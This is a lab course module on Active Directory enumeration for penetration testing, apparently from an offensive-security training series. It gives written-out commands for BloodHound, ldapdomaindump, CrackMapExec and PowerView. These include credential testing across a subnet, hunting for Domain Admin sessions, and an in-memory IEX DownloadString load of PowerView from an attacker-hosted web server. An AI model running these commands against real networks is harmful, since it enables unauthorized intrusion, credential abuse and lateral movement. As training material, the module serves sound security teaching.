Module 02 — Enumeration | Active Directory Labs

Enumeration Toolset

BloodHound

Graph-based AD attack path mapper. Ingests LDAP + SMB data via SharpHound/bloodhound-python and visualizes privilege escalation paths. Essential for finding non-obvious ACL chains.

ldapdomaindump

Dumps AD objects to JSON/HTML files via LDAP. Fast way to get a full user/group/computer listing with all attributes. No binary needed on the target — runs from Kali.

CrackMapExec

Swiss army knife for SMB/LDAP/WinRM enumeration. Tests credentials at scale, enumerates shares, checks local admin access across subnets, lists logged-in sessions.

PowerView

PowerShell AD enumeration framework. Run from a domain-joined machine (or a Windows machine with RSAT). Rich cmdlets for users, groups, ACLs, GPOs, trusts, and Kerberoastable accounts.

BloodHound

Setup and Data Collection

BloodHound consists of two components: the collector (SharpHound on Windows, or bloodhound-python from Kali) and the GUI (a graph database viewer backed by Neo4j). The collector gathers data via LDAP and SMB and outputs JSON files. The GUI imports those files and lets you run pre-built or custom queries.

From Kali, use bloodhound-python if you have valid domain credentials but no foothold on a Windows machine:

# Install kali@kali:~$ pip3 install bloodhound # Collect all data (users, groups, computers, ACLs, GPOs, trusts) kali@kali:~$ bloodhound-python -u jsmith -p 'Password123' \ -d meridianfg.local -ns 192.168.1.10 -c All # Outputs: computers.json, users.json, groups.json, domains.json, gpos.json

Start BloodHound and Neo4j, import the JSON files, then use these key built-in queries:

Find All Domain Admins — Who currently holds DA rights.
Shortest Paths to Domain Admins — All paths from any principal to DA.
Find Principals with DCSync Rights — Who can replicate all secrets from the DC.
Find AS-REP Roastable Users — Accounts with pre-authentication disabled.
Find Kerberoastable Users — Accounts with a non-null SPN attribute.

The "Shortest Paths to Domain Admins" query is the single most useful query in BloodHound. Run it immediately after every import to identify your attack objectives. Each edge (arrow) in the graph represents an exploitable relationship: group membership, ACL right, session, or trust.

ldapdomaindump

Dumping AD Objects via LDAP

ldapdomaindump produces human-readable HTML and machine-parseable JSON files for every major AD object class. It is fast, non-destructive, and runs entirely from Kali with any valid domain credential.

# Run ldapdomaindump kali@kali:~$ ldapdomaindump -u 'meridianfg\jsmith' -p 'Password123' \ 192.168.1.10 -o ./ldd-output/ # Output files # domain_users.html — all users with attributes # domain_groups.html — all groups and members # domain_computers.html — all machine accounts # domain_policy.html — password policy, lockout threshold # domain_trusts.html — trust relationships

The domain_policy.html file is particularly useful — it shows the password policy (minimum length, complexity, lockout threshold) which determines whether password spraying is safe (i.e. whether you'll lock accounts).

Check the lockout threshold in domain_policy.html before any password spray. If the lockout threshold is 3 invalid attempts, a spray with more than 2 password guesses per account per observation window will lock accounts — which creates incident alerts and denies legitimate users access.

CrackMapExec

SMB, LDAP, and WinRM Enumeration at Scale

CrackMapExec (CME) is the fastest way to validate credentials against many hosts simultaneously and to enumerate SMB information without needing to be domain-joined. Install it on Kali: apt install crackmapexec.

# Test a credential against the domain kali@kali:~$ crackmapexec smb 192.168.1.0/24 -u jsmith -p 'Password123' -d meridianfg.local # List SMB shares on a host kali@kali:~$ crackmapexec smb 192.168.1.10 -u jsmith -p 'Password123' --shares # Check which hosts the account has local admin on kali@kali:~$ crackmapexec smb 192.168.1.0/24 -u jsmith -p 'Password123' --local-auth # List logged-in sessions on a machine (requires admin) kali@kali:~$ crackmapexec smb 192.168.1.20 -u administrator -p 'Admin123!' --sessions # Enumerate users via LDAP kali@kali:~$ crackmapexec ldap 192.168.1.10 -u jsmith -p 'Password123' --users

A green [+] next to a host means the credential authenticated. Pwn3d! means the account has local administrator access on that host — a key finding for lateral movement planning.

CrackMapExec outputs are color-coded: green = success, red = failure. Save output with --log cme.log or pipe to a file. The CME database (~/.cme/cme.db) stores all credentials and hosts automatically for later reference.

PowerView

Deep AD Enumeration from Windows

PowerView is a PowerShell module that provides rich AD enumeration when you have execution on a Windows machine (domain-joined or with RSAT installed). Load it in memory to avoid writing to disk:

# Load PowerView in memory from a web server PS> IEX (New-Object Net.WebClient).DownloadString('http://<kali-ip>:8080/PowerView.ps1') # Or from a local path PS> Import-Module .\PowerView.ps1

Key PowerView commands for enumeration:

# Domain information PS> Get-Domain PS> Get-DomainController PS> Get-DomainTrust # Users PS> Get-DomainUser | Select SamAccountName, Description, PasswordLastSet, ServicePrincipalName PS> Get-DomainUser -UACFilter DONT_REQ_PREAUTH # AS-REP Roastable PS> Get-DomainUser -SPN # Kerberoastable # Groups PS> Get-DomainGroup "Domain Admins" | Select Member PS> Get-DomainGroupMember -Identity "Domain Admins" -Recurse # Computers PS> Get-DomainComputer | Select Name, OperatingSystem, IPv4Address # ACLs — find interesting ACEs for a given user PS> Get-DomainObjectAcl -SamAccountName jsmith -ResolveGUIDs # GPOs PS> Get-DomainGPO | Select DisplayName, GpcFileSysPath # Find machines where a high-value user is logged in PS> Find-DomainUserLocation -UserGroupIdentity "Domain Admins"

PowerView generates LDAP queries that may appear in SIEM logs. On a real engagement, use it deliberately — don't enumerate everything at once. In the lab, run freely to build muscle memory.

What to Enumerate and Why

Building the Attack Map

Enumeration is not about collecting data for its own sake — it's about answering specific questions that determine your attack path:

Users with weak or no pre-auth → AS-REP Roasting targets (Module 04)
Service accounts with SPNs → Kerberoasting targets (Module 04)
ACL misconfigurations → ACL abuse paths (Module 05). Look for GenericWrite, WriteDACL, ForceChangePassword on high-value accounts or groups.
SMB shares with sensitive data → Credential files, scripts with passwords, config files. Use CME --shares then smbclient to browse.
Local admin access via CME → Which machines can you reach with current credentials? Determines lateral movement scope (Module 06).
Session data (Find-DomainUserLocation) → Where is the Domain Admin currently logged in? That machine is your lateral movement target.
GPO permissions → Can your user modify a GPO? Modifying a GPO linked to a high-value OU lets you deploy commands to all machines in that OU.
Password policy → What can you spray safely? Determines password attack strategy.

Combine BloodHound's attack paths with CME's session data. BloodHound tells you which account to target; session data tells you which machine that account is currently on. Together they give you a complete attack plan before you execute a single exploit.

← Module 01 — AD Fundamentals Module 03 — Network Attacks →